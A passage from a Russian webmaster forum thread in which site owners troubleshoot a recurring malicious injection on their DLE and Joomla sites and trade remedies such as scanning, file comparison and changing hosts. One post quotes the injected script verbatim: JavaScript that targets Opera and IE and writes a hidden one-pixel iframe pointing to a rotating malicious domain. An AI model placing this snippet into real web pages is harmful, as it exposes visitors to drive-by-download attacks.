Вирус от certinee.ru

123
djinn11
На сайте с 16.05.2010
Offline
52
#11
gregzem:
Все способы поиска обфусцированного кода в движке достаточно трудоемки. Нужно ковырять код.
Для начала просканируйте AI-BOLIT'ом http://revisium.com/ai/, может сходу найдет что-то (оранжевые файлы тоже нужно просмотреть). Дальше есть вариант сравнения вашего движка с оригинальным дистрибутивном в каком-нибудь Araxis Merge Tool или Beyond Compare.

Проверял AI-BOLIT'ом, результата - ноль. Проверил все файлы подозреваемые AI-BOLIT'ом, в них ничего нет...

Сравнивал папки и файлы с помощью - Araxis Merge... тоже ноль.

И кстати, теперь во вредоносной вставке изменился домен(уже который раз)

<script>if (navigator.userAgent.search(/Opera|MSIE/) > -1) {document.write('<iframe src="http://dom1380752104' + '.' + 'mkdee.ru/temp/support/0nl2jhop08?cmpid=144465" style="position:absolute;top:-5px;height:1px;width:28px;"></iframe>');}</script></head>

Заметил, что постоянно меняются вот эти данные:

dom1380752104 - тут меняются цифры
mkdee.ru/temp/support/0nl2jhop08?cmpid=144465... подчеркнул что меняется

Может кто то уже нашел решение...? Или кто то знает как решить сию промблемму?

SIQWELL - Сервера, VDS, Хостинг во Франции, Люксембурге. Администрирование и IT обслуживание (https://siqwell.pw/aff.php?aff=003) Лучшая партнерка для download трафика! (http://loadpays.com/s.php?f=11008)
KU
На сайте с 17.07.2008
Offline
251
#12

Смените хостинг и посмотрите результат.

Хостинг ( https://good-host.net ) / Linux VPS ( https://good-host.net/vps ) / Windows VPS ( https://good-host.net/windows-vps ) / Выделенные серверы ( https://good-host.net/dedicated ) 14 лет онлайн!
T
На сайте с 04.10.2013
Offline
0
#13

Уважаемый!

Хотелось бы уточнить про перенос на другой хостинг - это Ваше предположение или именно так Вы избавились от такой проблемы.

PS. сайт тоже поражен таким кодом с 02 октября.

В моем случаи сайт написан на джумла 1.7 - возможно из-за старой версии и удалось внедрить левый код, а может и из-за хостера моего

AD
На сайте с 05.05.2007
Offline
240
#14
KM.UA:
Смените хостинг и посмотрите результат.

Хостинг не причем. Код в файлах. Никакие скрипты код обнаружить не могут. Счас разбираемся с проблемой, потом отпишусь.

T
На сайте с 04.10.2013
Offline
0
#15
ArmenDomain:
Хостинг не причем. Код в файлах. Никакие скрипты код обнаружить не могут. Счас разбираемся с проблемой, потом отпишусь.

Ждем-с результата

djinn11
На сайте с 16.05.2010
Offline
52
#16
ArmenDomain:
Хостинг не причем. Код в файлах. Никакие скрипты код обнаружить не могут. Счас разбираемся с проблемой, потом отпишусь.

Мне тоже интересны результаты... кстати на моем зараженном сайте двиг - dle.

KU
На сайте с 17.07.2008
Offline
251
#17
tomjerry:
Хотелось бы уточнить про перенос на другой хостинг - это Ваше предположение или именно так Вы избавились от такой проблемы.

Да, я лечил сервер где добавлялся этот код. В файлах ничего не было.

T
На сайте с 04.10.2013
Offline
0
#18
KM.UA:
Да, я лечил сервер где добавлялся этот код. В файлах ничего не было.

Вчерась на всякий случай восстановил backup сайта и перешел на другой хостинг - пока полет нормальный. Яндекс уже дал "добро" на мой сайт, гугл пока проверяет...

R
На сайте с 24.01.2008
Offline
180
#19
SHeks:
Смените хостинг!

Это может быть решением, но не всегда, нужно проверять сайты и делать анализ.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
AD
На сайте с 05.05.2007
Offline
240
#20

вчера пришло письмо о том что нашли вредноносный код в ЗЕРКАЛЕ сайта! Что интересно - с зеркала стоит только перенаправление с сервера! То есть файлов нет никаких где можно было вставить код.

А сегодня Яндекс опять забанил сайт с формулировкой " Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями."

Не понятно что твориться. Не virustotal.com, не sucuri.net и даже antivirus-alarm.ru ничего не находят.

Только что перенес на другой хостинг, посмотрю далее.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий